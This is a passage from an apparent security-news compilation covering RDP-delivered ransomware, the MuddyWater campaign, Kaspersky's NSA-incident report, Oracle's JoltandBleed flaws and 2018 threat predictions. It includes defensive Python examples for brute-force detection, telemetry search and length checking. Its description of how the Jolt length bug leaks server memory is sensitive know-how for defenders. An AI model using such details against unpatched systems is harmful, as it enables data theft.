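2017-11-14T03:12:16 4625 type=10 user=administrator src=203.0.113.7
2017-11-14T03:12:19 4624 type=10 user=administrator src=203.0.113.7
2017-11-14T03:15:40 4720 user=backupsvc by=administrator
2017-11-14T08:01:10 4625 type=10 user=jsmith src=198.51.100.5
2017-11-14T08:01:25 4624 type=10 user=jsmith src=198.51.100.5
2017-11-14T08:30:00 4625 type=3 user=svc_sql src=10.0.0.12
"""

FAIL_THRESHOLD = 5               # assumed: failures before a success that count as brute force
WINDOW = timedelta(minutes=10)   # assumed sliding window


def parse_events(text):
    """Parse the simplified 'timestamp id key=value ...' lines into dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, *pairs = line.split()
        fields = dict(p.split("=", 1) for p in pairs)
        events.append({"ts": datetime.fromisoformat(ts), "id": int(event_id), **fields})
    return events


def detect_rdp_bruteforce(events):
    """Flag sources with >= FAIL_THRESHOLD RDP failures inside WINDOW followed by a
    successful RDP logon, and record accounts created shortly after that logon."""
    findings = {}
    failures = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["id"] == 4625 and ev.get("type") == "10":
            recent = [t for t in failures[ev["src"]] if ev["ts"] - t <= WINDOW]
            failures[ev["src"]] = recent + [ev["ts"]]
        elif ev["id"] == 4624 and ev.get("type") == "10":
            recent = [t for t in failures.get(ev["src"], []) if ev["ts"] - t <= WINDOW]
            if len(recent) >= FAIL_THRESHOLD:
                findings[ev["src"]] = {"failures": len(recent), "user": ev["user"],
                                       "success_at": ev["ts"], "accounts_created": []}
        elif ev["id"] == 4720:
            # 4720 carries no source address; tie it to any flagged logon it follows closely
            for finding in findings.values():
                if finding["success_at"] <= ev["ts"] <= finding["success_at"] + WINDOW:
                    finding["accounts_created"].append(ev["user"])
    return findings


if __name__ == "__main__":
    for src, f in detect_rdp_bruteforce(parse_events(SAMPLE_EVENTS)).items():
        print(f"{src}: {f['failures']} failures, then logon as {f['user']}, "
              f"accounts created afterwards: {f['accounts_created']}")
```

The single failed logon from 198.51.100.5 followed by success stays below the threshold, so only the brute-forced source is reported.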

According to Sophos, the attackers demanded a 1 Bitcoin ransom from their victims. Although numerous companies were hit, the attackers’ Bitcoin wallet shows a single transaction matching the demanded amount. Either victims have not paid, or they managed to negotiate lower payments, the security researchers say.

“The victims of this kind of attack are almost always small-to-medium companies: the largest business in our investigation had 120 staff, but most had 30 or fewer,” Sophos says.

To stay protected, organizations are advised to turn off RDP, or to protect it well if they need to use it regularly. They should also consider using a Virtual Private Network (VPN) for connections from outside their network, along with two-factor authentication (2FA), and install available patches promptly to ensure their systems remain protected.

“You've probably heard the saying that 'if you want a job done properly, do it yourself’. Sadly, there's a niche of cybercrooks who have taken that advice to heart: if you've been sloppy setting up remote access to your network, they log in themselves and infect you with ransomware by simply running it directly, just like you or I might load Word or Notepad. This means the cyber criminals don’t need to mess around with emails, social engineering or malicious attachments,” said Paul Ducklin, Senior Technologist, Sophos.

The use of RDP to spread ransomware, however, isn’t a new practice. In fact, this attack method was so popular in the beginning of this year that it even topped email for ransomware distribution.

Last month, a BTCware ransomware variant called Payday was observed abusing the same method for infection. Security researchers investigating the attacks discovered that the malware operators were using brute-force attacks to crack RDP passwords and compromise the poorly secured systems.

Who is behind MuddyWater in the Middle East? Likely a politically-motivated actor
17.11.2017 securityaffairs BigBrothers

Researchers are investigating a mysterious wave of attacks in the Middle East that was dubbed MuddyWater due to the confusion in attributing the.
Security experts at Palo Alto Networks are monitoring long-lasting targeted attacks aimed at entities in the Middle East that are difficult to attribute.

The experts called the campaign ‘MuddyWater’ because of the confusion in attributing these attacks, which took place between February and October 2017 and targeted entities in Saudi Arabia, Iraq, Israel, the United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States.

The threat actors used a PowerShell-based first-stage backdoor named POWERSTATS; over time they changed their tools and techniques.

“This blog discusses targeted attacks against the Middle East taking place between February and October 2017 by a group Unit 42 is naming MuddyWater” states the analysis from PaloAlto Networks.

“MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call “POWERSTATS”. Despite broad scrutiny and reports on MuddyWater attacks, the activity continues with only incremental changes to the tools and techniques.”

MuddyWater attackers used a set of weaponized documents that were also used in recently observed incidents targeting the Saudi Arabian government. The same set of documents is similar to ones associated with a series of attacks discovered by experts at Morphisec.

The malicious documents associated with this last wave of attacks had been tailored according to the target regions.

Some of the attacks were attributed to FIN7, the group that launched a campaign aimed at employees involved in SEC filings.

Palo Alto Networks believes that the recent wave of attacks might have been mistakenly associated with the FIN7 group; it also reported that a C&C server delivering the FIN7-linked DNSMessenger tool was used in MuddyWater attacks as well.

The hackers maintained the same final payload while changing delivery methods between attacks.

“Based on these connections we can be confident that all the files and infrastructure […] are related, since more than one of these can be used to link each of the samples discussed in each case,” Palo Alto notes.

The hackers used well known tools, including Meterpreter, Mimikatz, Lazagne, Invoke-Obfuscation, and more.

In some recent attacks, the threat actor used GitHub to host the POWERSTATS backdoor.

“In some of their recent attack documents, the attackers also used GitHub as a hosting site for their custom backdoor, POWERSTATS.” continues the analysis.

The attackers managed a number of GitHub repositories related to their malware.

The experts observed compromised accounts at third-party organizations sending the MuddyWater malware. In one case, the attackers sent a malicious document that appears nearly identical to a legitimate attachment which Palo Alto observed later being sent to the same recipient.

“This indicates that the attackers stole and modified a legitimate document from the compromised user account, crafted a malicious decoy Word macro document using this stolen document and sent it to the target recipient who might be expecting the email from the original account user before the real sender had time to send it,” reported PaloAlto.


According to Palo Alto Networks, past attribution of the attacks was wrong: the group is not financially motivated as previously thought, but politically motivated.

Threat actors might have planted false flags to make attribution harder.

“Whilst we could conclude with confidence that the attacks discussed in this article are not FIN7 related, we were not able to answer many of our questions about the MuddyWater attacks. We are currently unable to make a firm conclusion about the origin of the attackers, or the specific types of information they seek out once on a network,” the security researchers concluded.

Kaspersky provided further details on NSA Incident. Other APTs targeted the same PC
17.11.2017 securityaffairs BigBrothers

Kaspersky Lab has published a full technical report on the hack of its antivirus software to steal NSA hacking code.
In October, an anonymous source claimed that in 2015 Russian intelligence stole NSA cyber weapons from the PC of one of the agency’s employees, which was running Kaspersky antivirus.

Kaspersky denies any direct involvement and provided further details about the hack, but it wasn’t a good period for the firm.

In September, the US Government banned the Russian security firm from all federal government systems.

The PC was hacked after the NSA employee installed a backdoored key generator for a pirated copy of Microsoft Office.

In October Kaspersky Lab published a detailed report on the case that explains how cyber spies could have easily stolen the software exploits from the NSA employee’s Windows PC.

In October many media outlets accused Kaspersky of helping Russian intelligence detect the US cyber-weapons on the PC via its security solutions, but according to the security firm the situation is quite different.

According to the telemetry logs collected by the Russian firm, the staffer temporarily switched off the antivirus protection on the PC and infected his personal computer with spyware from a product key generator while trying to use a pirated copy of Office.

On September 11, 2014, Kaspersky antivirus detected the Win32.GrayFish.gen trojan on the NSA employee’s PC; some time later the employee disabled the Kaspersky software to execute the activation-key generator.

When the antivirus was reactivated on October 4, it removed the backdoored key-gen tool from the NSA employee’s PC and uploaded it to Kaspersky’s cloud for further analysis.

Kaspersky offered to hand over the source code of its solution to US experts to prove it wasn’t involved in any cyber espionage operation.

Back to the present: Kaspersky has published a new report that sheds light on the investigation conducted by the firm into the NSA-linked Equation Group APT.

Kaspersky ran searches in its databases going back to June 2014, 6 months prior to the year of the alleged hack of its antivirus, for all alerts whose names matched wildcards such as “HEUR:Trojan.Win32.Equestre.*”. The experts found a few test signatures in place that produced a large number of false positives.

The analysis revealed a specific signature that fired a large number of times in a short time span on just one system: the signature “HEUR:Trojan.Win32.Equestre.m”, triggered by a 7zip archive (referred to below as “[undisclosed].7z”). This was the starting point of the analysis of that system, which was found to contain not only this archive but many files, both common and unknown, indicating that the user was probably involved in the malware’s development.
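The kind of telemetry search described above, as an added example that is not Kaspersky’s code: a wildcard search over detection verdict names, a per-signature profile that separates a noisy test signature (one hit on many hosts) from a concentrated detection (many hits on one host), and a sliding-window burst check per host. The sample alerts, the host ids and the five-minute window are constructed for this example.

```python
import fnmatch
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry for this example: (timestamp, host id, verdict).
# Host ids are placeholders; verdict names follow the page's
# "HEUR:Trojan.Win32.Equestre.*" naming. host-A fires one signature many
# times within a minute (concentrated, worth a look); the ".test" signature
# fires once on several unrelated hosts (the noisy false-positive pattern).
SAMPLE_ALERTS = [
    ("2014-09-11T10:00:00", "host-A", "HEUR:Trojan.Win32.Equestre.m"),
    ("2014-09-11T10:00:07", "host-A", "HEUR:Trojan.Win32.Equestre.m"),
    ("2014-09-11T10:00:15", "host-A", "HEUR:Trojan.Win32.Equestre.m"),
    ("2014-09-11T10:00:31", "host-A", "HEUR:Trojan.Win32.Equestre.m"),
    ("2014-09-11T10:01:02", "host-A", "HEUR:Trojan.Win32.Equestre.m"),
    ("2014-09-11T14:20:00", "host-B", "HEUR:Trojan.Win32.Equestre.m"),
    ("2014-09-12T08:00:00", "host-D", "HEUR:Trojan.Win32.Equestre.test"),
    ("2014-09-12T08:05:00", "host-E", "HEUR:Trojan.Win32.Equestre.test"),
    ("2014-09-12T08:10:00", "host-F", "HEUR:Trojan.Win32.Equestre.test"),
    ("2014-09-12T09:00:00", "host-C", "HEUR:Trojan.Win32.Generic"),
]


def matching_alerts(alerts, pattern):
    """Wildcard search over verdict names, e.g. 'HEUR:Trojan.Win32.Equestre.*'."""
    return [a for a in alerts if fnmatch.fnmatchcase(a[2], pattern)]


def signature_profile(alerts):
    """Per verdict: (number of distinct hosts, most hits on any single host).
    A noisy test signature shows many hosts with about one hit each; a genuine
    concentrated detection shows few hosts with many hits."""
    per_sig_host = defaultdict(lambda: defaultdict(int))
    for _, host, verdict in alerts:
        per_sig_host[verdict][host] += 1
    return {sig: (len(hosts), max(hosts.values()))
            for sig, hosts in per_sig_host.items()}


def bursts_per_host(alerts, window=timedelta(minutes=5), min_hits=3):
    """Hosts where at least min_hits alerts fall inside one sliding window.
    Returns {host: largest hit count seen in any window}."""
    by_host = defaultdict(list)
    for ts, host, _ in alerts:
        by_host[host].append(datetime.fromisoformat(ts))
    bursts = {}
    for host, times in by_host.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_hits:
            bursts[host] = best
    return bursts


if __name__ == "__main__":
    hits = matching_alerts(SAMPLE_ALERTS, "HEUR:Trojan.Win32.Equestre.*")
    print(signature_profile(hits))   # {'...Equestre.m': (2, 5), '...Equestre.test': (3, 1)}
    print(bursts_per_host(hits))     # {'host-A': 5}
```

On real telemetry the same three steps apply in order: narrow by family with the wildcard, drop signatures whose profile is wide and flat (the false-positive shape), then rank the remaining hosts by burst size.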

“In total we detected 37 unique files and 218 detected objects, including executables and archives containing malware associated with the Equation Group. Looking at this metadata during current investigation we were tempted to include the full list of detected files and file paths into current report, however, according to our ethical standards, as well as internal policies, we cannot violate our users’ privacy.” states the new report published by Kaspersky.

“This was a hard decision, but should we make an exception once, even for the sake of protecting our own company’s reputation, that would be a step on the route of giving up privacy and freedom of all people who rely on our products. Unless we receive a legitimate request originating from the owner of that system or a higher legal authority, we cannot release such information.”


The analysis of the computer where the archive was found revealed that it was already infected with malware. In October of that year the user downloaded a pirated copy of Microsoft Office 2013, but the .ISO contained the Mokes backdoor.

“What is interesting is that this ISO file is malicious and was mounted and subsequently installed on the system along with files such as “kms.exe” (a name of a popular pirated software activation tool), and “kms.activator.for.microsoft.windows.8.server.2012.and.office.2013.all.editions”. Kaspersky Lab products detected the malware with the verdict Backdoor.Win32.Mokes.hvl.” continues Kaspersky.

Kaspersky was able to detect and halt Mokes, but the user turned off the Russian software to execute the keygen.

Once the antivirus was turned on again, it detected the malware. Kaspersky added that over a two-month period its security software found 128 separate malware samples on the machine that weren’t related to the Equation Group.

Kaspersky found that the Mokes’ command and control servers were apparently being operated by a Chinese entity going by the name “Zhou Lou”, from Hunan, using the e-mail address “zhoulu823@gmail.com.”

Kaspersky explained that it’s also possible that the NSA contractor’s PC may have been infected with a sophisticated strain of malware developed by an APT that was not detected at the time.

“Given that system owner’s potential clearance level, the user could have been a prime target of nation states,” Kaspersky said. “Adding the user’s apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands.”

Further details are included in the technical report.

Oracle issues emergency patches for JOLTANDBLEED flaws
17.11.2017 securityaffairs

JoltandBleed – Oracle issued an emergency patch for vulnerabilities affecting several of its products that rely on the proprietary Jolt protocol.

The vulnerabilities were reported by experts at ERPScan who named the set of five vulnerabilities JoltandBleed.

The most critical flaws were rated with the highest CVSS base scores, 9.9 and even 10.0; according to the experts, they may be exploited over a network without the need for a valid username and password.

The JoltandBleed issues affect the Jolt server within Oracle Tuxedo that is used by numerous Oracle’s products, including Oracle PeopleSoft. An attacker can exploit the vulnerabilities to gain full access to all data stored in the following ERP systems:

Oracle PeopleSoft Campus Solutions
Oracle PeopleSoft Human Capital Management
Oracle PeopleSoft Financial Management
Oracle PeopleSoft Supply Chain Management, etc.
Below is the complete list of the JoltandBleed vulnerabilities discovered by the experts:

CVE-2017-10272 is a memory disclosure vulnerability; its exploitation gives an attacker a chance to remotely read the memory of the server.
CVE-2017-10267 is a stack overflow vulnerability.
CVE-2017-10278 is a heap overflow vulnerability.
CVE-2017-10266 is a vulnerability that makes it possible for a malicious actor to brute-force the DomainPWD password, which is used for Jolt protocol authentication.
CVE-2017-10269 is a vulnerability affecting the Jolt protocol; it enables an attacker to compromise the whole PeopleSoft system.
The flaw is tied to the way the Jolt Handler (JSH) processes a command with opcode 0x32.

“This error is originated with that how Jolt Handler processes a command with opcode 0x32. If the package structure is incorrect, a programmer has to provide a Jolt client with a certain Jolt response indicating there is an error in the communication process,” continues ERPScan.

Oracle made the patches available Tuesday for Oracle Fusion Middleware, which address all vulnerabilities.


The vulnerability was caused by a coding mistake in a function call that was responsible for packing data to transmit.

“The confusion was between 2 functions, jtohi and htoji. Consequently, packing of a constant package length that must be 0x40 bytes is actually 0x40000000,” said ERPScan.

“Then a client initiates the transmission of 0x40000000 bytes of data. Manipulating the communication with the client, an attacker can achieve a stable work of a server side and sensitive data leakage. Initiating a mass of connections, the hacker passively collects the internal memory of the Jolt server.”
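An added illustration (not ERPScan’s or Oracle’s code) of the byte-order mistake quoted above and of the check a hardened reader should make before honouring a declared length. It assumes that jtohi/htoji are 32-bit conversions between wire byte order and host byte order; the frame layout, the helper names and the MAX_FRAME ceiling are assumptions made for the example.

```python
import struct

# Added example. Assumption: the jtohi/htoji pair named on the page converts a
# 32-bit integer between "Jolt wire order" and host order; wire order is modelled
# here as big-endian and host order as little-endian (x86). JOLT_HEADER_LEN is the
# fixed 0x40-byte length the page mentions; MAX_FRAME is a constructed ceiling.
JOLT_HEADER_LEN = 0x40
MAX_FRAME = 64 * 1024


def htoji(value: int) -> bytes:
    """Host integer -> 4 bytes in wire order."""
    return struct.pack(">I", value)


def jtohi(data: bytes) -> int:
    """4 bytes in wire order -> host integer."""
    return struct.unpack(">I", data[:4])[0]


def pack_length_correct(length: int) -> bytes:
    """What the sender should emit for the length field."""
    return htoji(length)


def pack_length_confused(length: int) -> bytes:
    """The slip described on the page: the value is written in host byte order
    instead of wire order, so the receiving side, decoding with jtohi, sees
    0x40 as 0x40000000."""
    return struct.pack("<I", length)


def read_frame(frame: bytes):
    """Defensive reader. The declared total length (4-byte field + payload) is
    checked against protocol bounds and against the bytes actually present
    before a single payload byte is used. Returns the payload, or None."""
    if len(frame) < 4:
        return None
    declared = jtohi(frame[:4])
    if declared < JOLT_HEADER_LEN or declared > MAX_FRAME:
        return None          # outside protocol range: reject, do not wait for more
    if declared > len(frame):
        return None          # more declared than exists: never serve phantom bytes
    return frame[4:declared]


if __name__ == "__main__":
    print(hex(jtohi(pack_length_correct(JOLT_HEADER_LEN))))   # 0x40
    print(hex(jtohi(pack_length_confused(JOLT_HEADER_LEN))))  # 0x40000000
    print(read_frame(pack_length_confused(JOLT_HEADER_LEN) + b"A" * 60))  # None
```

The two-sided check matters: a protocol ceiling alone still lets a peer declare slightly more than it sent, so the length is also compared with the bytes on hand before any copy or send is sized from it.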

The vulnerability causes the leakage of credentials when a user enters them through the web interface of PeopleSoft systems.

Technically, the flaw is a memory leakage vulnerability similar to Heartbleed, so it can be used to retrieve user passwords and other sensitive data.

“One of the possible attacks besides an obvious theft of employees data is for students to hack Campus Solutions and modify or delete payment orders for their education or gain financial aid. This attack as well as other details was demonstrated today at the DeepSec Security conference in Vienna.” said ErpScan.

According to Oracle, the CVE-2017-10272 memory disclosure vulnerability is easy to exploit and allows a low-privileged attacker with network access via Jolt to compromise Oracle Tuxedo.

“Vulnerability in the Oracle Tuxedo component of Oracle Fusion Middleware (subcomponent: Core). Supported versions that are affected are 11.1.1, 12.1.1, 12.1.3 and 12.2.2. Easily exploitable vulnerability allows low privileged attacker with network access via Jolt to compromise Oracle Tuxedo.” wrote Oracle. “While the vulnerability is in Oracle Tuxedo, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Tuxedo accessible data as well as unauthorized access to critical data or complete access to all Oracle Tuxedo accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Tuxedo.”

Threat Predictions for Automotive in 2018
17.11.2017 Kaspersky Analysis
The landscape in 2017
Modern cars are no longer just electro-mechanical vehicles. With each generation, they become more connected and incorporate more intelligent technologies to make them smarter, more efficient, comfortable and safe. The connected-car market is growing at a five-year compound annual growth rate of 45% — 10 times faster than the car market overall.

In some regions (e.g. the EU or Russia) two-way connected systems (eCall, ERA-GLONASS) are extensively implemented for safety and monitoring purposes; and all major auto manufacturers now offer services that allow users to interact remotely with their car via a web interface or a mobile app.

Remote fault diagnostics, telematics and connected infotainment significantly enhance driver safety and enjoyment, but they also present new challenges for the automotive sector as they turn vehicles into prime targets for cyberattack. The growing risk of a vehicle’s systems being infiltrated or having its safety, privacy and financial elements violated, requires manufacturers to understand and apply IT security. Recent years have seen a number (here, here, and here) of examples highlighting the vulnerability of connected cars.

What can we expect in 2018?
Gartner estimates that there will be a quarter of a billion connected cars on the roads by 2020. Others suggest that by then around 98% of cars will be connected to the Internet. The threats we face now, and those we expect to face over the coming year should not be seen in isolation – they are part of this continuum – the more vehicles are connected, in more ways, the greater the surface and opportunities for attack.

The threats facing the automotive sector over the coming 12 months include the following:

Vulnerabilities introduced through lack of manufacturer attention or expertise, combined with competitive pressures. The range of connected mobility services being launched will continue to rise, as will the number of suppliers developing and delivering them. This ever-growing supply (and the likelihood of products/suppliers being of variable quality), coupled with a fiercely competitive marketplace could lead to security short cuts or gaps that provide an easy way in for attackers.
Vulnerabilities introduced through growing product and service complexity. Manufacturers serving the automotive sector are increasingly focused on delivering multiple interconnected services to customers. Every link is a potential point of weakness that attackers will be quick to seize on. An attacker only needs to find one insecure opening, whether that is peripheral such as a phone Bluetooth or a music download system, for example, and from there they may be able to take control of safety-critical electrical components like the brakes or engine, and wreak havoc.
No software code is 100% bug free – and where there are bugs there can be exploits. Vehicles already carry more than 100 million lines of code. This in itself represents a massive attack surface for cybercriminals. And as more connected elements are installed into vehicles, the volume of code will soar, increasing the risk of bugs. Some automotive manufacturers, including Tesla, have introduced specific bug bounty programs to address this.
Further, with software being written by different developers, installed by different suppliers, and often reporting back to different management platforms, no one player will have visibility of, let alone control over, all of a vehicle’s source code. This could make it easier for attackers to bypass detection.
Apps mean happiness for cybercriminals. There are a growing number of smartphone apps, many introduced by car manufacturers, which owners can download to remotely unlock their cars, check the engine status or find its location. Researchers have already demonstrated proof of concepts of how such apps can be compromised. It will not be long before Trojanized apps appear that inject malware direct into the heart of an unsuspecting victim’s vehicle.
With connected components increasingly introduced by companies more familiar with hardware than software, there is a growing risk that the need for constant updates could be overlooked. This could make it harder, if not impossible, for known issues to be patched remotely. Vehicle recalls take time and cost money, and in the meantime many drivers will be left exposed.
Connected vehicles will generate and process ever more data – about the vehicle, but also about journeys and even personal data on the occupants – this will be of growing appeal to attackers looking to sell the data on the black market or to use it for extortion and blackmail. Car manufacturers are already under pressure from marketing companies eager to get legitimate access to passenger and journey data for real time location-based advertising.
Fortunately, growing awareness and understanding of security threats will result in the first cyber-secure devices for remote diagnostic and telematics data appearing on the market.
Further, lawmakers will come up with requirements and recommendations for making cybersecurity a mandatory part of all connected vehicles.
Last but not least, alongside existing safety certification there will be new organizations set up that are responsible for cybersecurity certification. They will use clearly defined standards to assess connected vehicles in terms of their resistance to cyberattacks.
Recommended action
Addressing these risks involves integrating security as standard, by design, focused on different parts of the connected car ecosystem. Defensive software solutions could be installed locally on individual electrical components— for instance, the brakes — to reinforce them against attacks. Next, software can protect the vehicle’s internal network as a whole by examining all network communications, flagging any changes in standard in-vehicle network behaviour and stopping attacks from advancing in the network. Overarching this, a solution needs to protect all components that are connected externally, to the Internet. Cloud security services can detect and correct threats before they reach the vehicle. They also can send the vehicle over-the-air updates and intelligence in real time. All of this should be supported with rigorous and consistent industry standards.

Threat Predictions for Connected Health in 2018
17.11.2017 Kaspersky Analysis
The landscape in 2017
In 2017, Kaspersky Lab research revealed the extent to which medical information and patient data stored within the connected healthcare infrastructure is left unprotected and accessible online for any motivated cybercriminal to discover. For example, we found open access to around 1,500 devices used to process patient images. In addition, we found that a significant amount of connected medical software and web applications contains vulnerabilities for which published exploits exist.

This risk is heightened because cyber-villains increasingly understand the value of health information, its ready availability, and the willingness of medical facilities to pay to get it back.

What can we expect in 2018?
The threats to healthcare will increase as ever more connected devices and vulnerable web applications are deployed by healthcare facilities. Connected healthcare is driven by a number of factors, including a need for resource and cost efficiency; a growing requirement for remote, home-based care for chronic conditions like diabetes and ageing populations; consumer desire for a healthy lifestyle; and a recognition that data-sharing and patient monitoring between organizations can significantly enhance the quality and effectiveness of medical care.

The threats facing these trends over the coming 12 months include the following:

Attacks targeting medical equipment with the aim of extortion, malicious disruption or worse, will rise. The volume of specialist medical equipment connected to computer networks is increasing. Many such networks are private, but one external Internet connection can be enough for attackers to breach and spread their malware through the ‘closed’ network. Targeting equipment can disrupt care and prove fatal – so the likelihood of the medical facility paying up is very high.
There will also be a rise in the number of targeted attacks focused on stealing data. The amount of medical information and patient data held and processed by connected healthcare systems grows daily. Such data is immensely valuable on the black market and can also be used for blackmail and extortion. It’s not just other criminals who could be interested: the victim’s employer or insurance company might want to know as it could impact premiums or even job security.
There will be more incidents related to ransomware attacks against healthcare facilities. These will involve data encryption as well as device blocking: connected medical equipment is often expensive and sometimes life-critical, which makes it a prime target for attack and extortion.
The concept of a clearly-defined corporate perimeter will continue to ‘erode’ in medical institutions, as ever more workstations, servers, mobile devices and equipment go online. This will give criminals more opportunities to gain access to medical information and networks. Keeping defenses and endpoints secure will be a growing challenge for healthcare security teams as every new device will open up a new entry point into the corporate infrastructure.
Sensitive and confidential data transmitted between connected ‘wearables’, including implants, and healthcare professionals will be a growing target for attack as the use of such devices in medical diagnosis, treatment and preventative care continues to increase. Pacemakers and insulin pumps are prime examples.
National and regional healthcare information systems that share unencrypted or otherwise insecure patient data between local practitioners, hospitals, clinics and other facilities will be a growing target for attackers looking to intercept data beyond the protection of corporate firewalls. The same applies to data shared between medical facilities and health insurance companies.
The growing use by consumers of connected health and fitness gadgets will offer attackers access to a vast volume of personal data that is generally minimally protected. The popularity of health-conscious, connected lifestyles means that fitness bracelets, trackers, smart watches, etc. will carry and transmit ever larger quantities of personal data with only basic security – and cybercriminals won’t hesitate to exploit this.
Disruptive attacks – whether in the form of denial of service attacks or through ‘ransomware’ that simply destroys data (such as WannaCry) – are a growing threat to increasingly digital health care facilities. The ever increasing number of work stations, electronic records management and digital business processes that underpin any modern organization broadens the attack surface for cybercriminals. In healthcare, they take on an extra urgency, as any disruption can in real terms become a matter of life or death.
Last, but not least, emerging technologies such as connected artificial limbs, implants for smart physiological enhancements, embedded augmented reality etc. designed both to address disabilities and create better, stronger, fitter human beings – will offer innovative attackers new opportunities for malicious action and harm unless they have security integrated from the very first moment of design.

Threat Predictions for Financial Services and Fraud in 2018
17.11.2017 Kaspersky Analysis
The landscape in 2017
In 2017 we’ve seen fraud attacks in financial services become increasingly account-centric. Customer data is a key enabler for large-scale fraud attacks and the frequency of data breaches among other successful attack types has provided cybercriminals with valuable sources of personal information to use in account takeover or false identity attacks. These account-centric attacks can result in many other losses, including that of further customer data and trust, so mitigation is as important as ever for businesses and financial services customers alike.

What can we expect in 2018?
2018 will be a year of innovation in financial services as the pace of change in this space continues to accelerate. As more channels and new financial service offerings emerge, threats will diversify. Financial services will need to focus on omni-channel fraud prevention to successfully identify more fraud crossing from online accounts to newer channels. Newer successful payment types will see more attack attempts as their profitability for attack increases.

Real-time payment challenges. Increasing demand from consumers for real-time and cross-border financial transactions results in pressure to analyse risk more quickly. Consumer expectations for friction-free payments make this task even more challenging. Financial services will need to rethink and make ‘Know Your Customer’ processes more effective. Machine learning and eventually AI-based solutions will also be key in meeting the need for quicker fraud and risk detection.
Social engineering attacks. Financial services will need to stay focused on tried and tested attack techniques. In spite of more sophisticated emergent threats, social engineering and phishing continue to be some of the simplest and most profitable attacks – exploiting the human element as the weakest link. Customer and employee education should continue to improve awareness of the latest attacks and scams.
Mobile threats. According to the latest Kaspersky Cybersecurity Index, ever more online activity now takes place on mobile. For example, 35 per cent of people now use their smartphone for online banking and 29 per cent for online payment systems (up from 22 per cent and 19 per cent respectively in the previous year). These mobile-first consumers will increasingly be prime targets for fraud. Cybercriminals will use previously-successful and new malware families to steal user banking credentials in creative ways. In 2017 we saw the modification of malware family Svpeng. In 2018, other families of mobile malware will re-surface to target banking credentials with new features. Identification and the removal of mobile malware is essential to financial services institutions to stop these attacks early.
Data breaches. Data breaches will continue to make the headlines in 2018 and the secondary impact on financial institutions will be felt through fake account set ups and account take-over attacks. Data breaches, although harder to commit than individual fraud attacks against customers, are hugely profitable to criminals thanks to the high volume of customer data exposed in one hit. Financial services should regularly test their defences and use solutions to detect any suspicious access at the earliest stages.
Cryptocurrency targets. More financial institutions will explore the application of cryptocurrencies, making attacks on these currencies a key target for cybercriminals. We already saw the occurrence of mining malware increasing in 2017 and more attempts to exploit these currencies will be seen in 2018. Solutions capable of detecting the latest malware families should be used as well as combining the latest threat intelligence into prevention strategies. [See Threat Predictions for Cryptocurrencies for further information on this threat.]
Account takeover. More secure physical payments through chip technology and other Point of Sale improvements, have shifted fraud online in the past decade. Now, as online payment security improves through tokenisation, biometric technology and more, fraudsters are shifting to account takeover attacks. Industry estimates suggest fraud of this type will run into billions of dollars as fraudsters pursue this highly profitable attack vector. Financial services will need to rethink digital identities and use innovative solutions to be sure that customers are who they say they are, every time.
Pressure to innovate. More and more businesses will venture into payment solutions and open banking offerings in 2018. Innovation will be key to incumbent financial service firms seeking a competitive advantage over an increasing number of competitors. But understanding the regulatory complications can be challenging enough, never mind evaluating the potential for attack on new channels. These new offerings will be targets for fraudsters upon release and any new solution not designed with security at the core will find itself an easy target for cybercriminals.
Fraud-as-a-Service. International underground communication amongst cybercriminals means that knowledge is shared quickly and attacks can spread globally even faster. Fraud services are offered on the dark web, from bots and phishing translation services to remote access tools. Less experienced cybercriminals purchase and use these tools, meaning more attempted attacks for financial services to block. Sharing knowledge across departments as well as looking to threat intelligence services will be key in mitigation.
ATM attacks. ATMs will continue to attract the attention of many cybercriminals. In 2017, Kaspersky Lab researchers uncovered, among other things, attacks on ATM systems that involved new malware, remote and fileless operations, and an ATM-targeting malware called ‘Cutlet Maker’ that was being sold openly on the DarkNet market for a few thousand dollars with a step-by-step user guide. Kaspersky Lab has published a report on future ATM attack scenarios targeting ATM authentication systems.

Threat Predictions for Industrial Security in 2018
17.11.2017 Kaspersky Analysis
The landscape in 2017
2017 was one of the most intense years in terms of incidents affecting the information security of industrial systems. Security researchers discovered and reported hundreds of new vulnerabilities, warned of new threat vectors in ICS and technological processes, provided data on accidental infections of industrial systems and detected targeted attacks (for example, Shamoon 2.0/StoneDrill). And, for the first time since Stuxnet, they discovered a malicious toolset some call a ‘cyber-weapon’ targeting physical systems: CrashOverride/Industroyer.

However, the most significant threat to industrial systems in 2017 was encryption ransomware attacks. According to a Kaspersky Lab ICS CERT report, in the first half of the year experts discovered encryption ransomware belonging to 33 different families. Numerous attacks were blocked, in 63 countries across the world. The WannaCry and ExPetr destructive ransomware attacks appear to have changed forever the attitude of industrial enterprises to the problem of protecting essential production systems.

What can we expect in 2018?
A rise in general and accidental malware infections. With few exceptions, cybercriminal groups have not yet discovered simple and reliable schemes for monetizing attacks on industrial information systems. Accidental infections and incidents in industrial networks caused by ‘normal’ (general) malicious code aimed at a more traditional cybercriminal target such as the corporate networks, will continue in 2018. At the same time, we are likely to see such situations result in more severe consequences for industrial environments. The problem of regularly updating software in industrial systems in line with the corporate network remains unresolved, despite repeated warnings from the security community.
Increased risk of targeted ransomware attacks. The WannaCry and ExPetr attacks taught both security experts and cybercriminals that operational technology (OT) systems are more vulnerable to attack than IT systems, and are often exposed to access through the Internet. Moreover, the damage caused by malware can exceed that in the corresponding corporate network, and ‘firefighting’ in the case of OT is much more difficult. Industrial companies have demonstrated how inefficient their organization and staff can be when it comes to cyberattacks on their OT infrastructure. All of these factors make industrial systems a desirable target for ransomware attacks.
More incidents of industrial cyberespionage. The growing threat of organized ransomware attacks against industrial companies could trigger development of another, related area of cybercrime: the theft of industrial information systems data to be used afterwards for the preparation and implementation of targeted (including ransomware) attacks.
